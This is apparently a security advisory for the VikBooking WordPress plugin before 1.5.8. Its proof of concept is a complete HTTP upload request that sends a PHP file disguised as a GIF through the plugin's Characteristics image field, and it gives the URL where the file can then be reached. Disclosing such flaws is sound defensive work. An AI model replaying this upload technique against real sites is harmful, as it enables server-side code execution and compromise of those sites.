VikBooking Hotel Booking Engine & PMS < 1.5.8 - Admin+ PHP File Upload

Proof of Concept

Edit/add a Characteristics (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as a Characteristic Image:

POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a;
<?php phpinfo() ?>

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--


PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php